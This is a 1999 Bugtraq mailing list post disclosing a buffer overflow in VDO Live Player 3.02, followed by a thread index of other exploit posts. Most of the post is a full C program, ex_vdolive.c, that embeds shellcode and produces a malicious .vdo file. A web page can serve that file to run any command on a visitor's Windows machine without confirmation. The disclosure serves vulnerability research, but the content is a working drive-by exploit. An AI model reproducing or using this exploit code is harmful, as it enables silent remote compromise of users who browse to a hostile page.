Bugtraq mailing list archives
VDO Live Player 3.02 Buffer Overflow
From: shadowpenguin () BACKSECTION NET (UNYUN)
Date: Mon, 13 Dec 1999 06:25:16 +0900
Hello VDO Live Player overflows when that reads the .vdo file that contains the long address. If VDO Live Player is installed on the system and the setting of browser is default, .vdo file is downloaded and executed without the confirmation. So, if the clients visit the webpage which is written the automatic download code of vdo file (such as META tag) that contains the attack code, the client machine will be cracked by the instructions which are written in vdo file. The buffer which is specified by ESP is too small to put the complex code, but the top line of the vdo file is stored at the address of ecx+0x30, it is long enough to set the cracking code. The following sample source code generates the .vdo file that executes any commands on the visitors machine. (This code is tested Japanese Windows98 only) ----- /*==================================================================== ex_vdolive.c / VDO Live Player 3.02 32bit exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin () backsection net) =================================================================== */ #include <stdio.h> #include <string.h> #include <windows.h> #define RETADR 90 #define CODE1_OFS 102 #define CODE2_OFS 10 #define MAXBUF1 180 #define MAXBUF2 1500 #define JMPESP_1 0xff #define JMPESP_2 0xe4 #define NOP 0x90 #define KERNEL_NAME "kernel32.dll" unsigned char exploit_jmping[100]={ 0x33,0xDB,0x8B,0x41,0x30,0xB3,0xBB,0x03, 0xC3,0xFF,0xE0,0x00}; unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53, 0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23, 0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B, 0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4,0x83, 0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,0x83, 0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF, 0xFF,0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit."; unsigned int search_mem(unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p<ed;p++) if (*p==c1 && *(p+1)==c2){ adr=(unsigned int)p; if ((adr&0xff)==0) continue; if (((adr>>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } main(int argc,char *argv[]) { unsigned int i,kp,ip,p1,p2; static unsigned char buf1[MAXBUF1],buf2[MAXBUF2],*q; FILE *fp; MEMORY_BASIC_INFORMATION meminfo; if (argc<2){ printf("usage: %s FileName Command\n",argv[0]); exit(1); } if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){ printf("Can not find %s\n",KERNEL_NAME); exit(1); } VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION)); for (i=0;i<meminfo.RegionSize;i++){ ip=kp+i; if ( ( ip &0xff)==0 || ((ip>>8 )&0xff)==0 || ((ip>>16)&0xff)==0 || ((ip>>24)&0xff)==0) continue; q=(unsigned char *)ip; if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break; } if (i==meminfo.RegionSize){ printf("Can not find codes which are used by this exploit.\n"); exit(1); } printf("RETADR : %x\n",ip); memset(buf1,NOP,MAXBUF1-1); memset(buf2,NOP,MAXBUF2-1); buf1[RETADR ]=ip&0xff; buf1[RETADR+1]=(ip>>8)&0xff; buf1[RETADR+2]=(ip>>16)&0xff; buf1[RETADR+3]=(ip>>24)&0xff; strcat(cmdbuf,argv[2]); strncpy(buf1+CODE1_OFS,exploit_jmping,strlen(exploit_jmping)); p1=(unsigned int)GetProcAddress((HMODULE)kp,"LoadLibraryA"); p2=(unsigned int)GetProcAddress((HMODULE)kp,"GetProcAddress"); printf("LoadLibrary Address : %x\n",p1); printf("GetProcAddress Address : %x\n",p2); strcat(exploit_code,cmdbuf); exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x21]=exploit_code[0x35]=p2&0xff; exploit_code[0x22]=exploit_code[0x36]=(p2>>8)&0xff; exploit_code[0x23]=exploit_code[0x37]=(p2>>16)&0xff; exploit_code[0x24]=exploit_code[0x38]=(p2>>24)&0xff; exploit_code[0x41]=strlen(argv[2]); memcpy(buf2+CODE2_OFS,exploit_code,strlen(exploit_code)); strncpy(buf1,"vdo://",6); buf1[MAXBUF1]=0; buf2[MAXBUF2]=0; if ((fp=fopen(argv[1],"w"))==NULL){ printf("Can not create '%s'\n",argv[1]); exit(1); } fprintf(fp,"%s/%s\n",buf1,buf2); printf("File '%s' is created.\n",argv[1]); return FALSE; } ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] shadowpenguin () backsection net (webmaster) % eEye Digital Security Team [ http://www.eEye.com ] unyun () eEye com
Current thread:
- sadmind exploits (remote sparc/x86) Marcy Abene (Dec 10)
- Re: sadmind exploits (remote sparc/x86) Erik Fichtner (Dec 10)
- Re: sadmind exploits (remote sparc/x86) Lamont Granquist (Dec 10)
- Irix and TCP implementation TeSd (Dec 10)
- 64bit Sol7 on Ultra1 < 200mhz bug Jake Luck (Dec 11)
- VDO Live Player 3.02 Buffer Overflow UNYUN (Dec 12)
- ssh-1.2.27 exploit Jarek Kutylowski (Dec 13)
- Re: ssh-1.2.27 exploit Iván Arce (Dec 13)
- Re: ssh-1.2.27 exploit Beto (Dec 15)
- FreeBSD 3.3 xsoldier root exploit Brock Tellier (Dec 15)
- Xsoldier xploit (was: FreeBSD 3.3 xsoldier root exploit) Spidey (Dec 15)
- BindView Security Advisory: Vulnerability in Windows NT's SYSKEY feature BindView Security Advisory (Dec 16)
- Cisco Security Advisory: Cisco Cache Engine Authentication Vulnerabilities security-alert () CISCO COM (Dec 16)
- Reinventing the wheel (aka "Decoding Netscape Mail passwords") Vanja Hrustic (Dec 15)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") John Viega (Dec 16)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") Tim Hollebeek (Dec 16)
- Re: sadmind exploits (remote sparc/x86) Lamont Granquist (Dec 10)
- Re: sadmind exploits (remote sparc/x86) Erik Fichtner (Dec 10)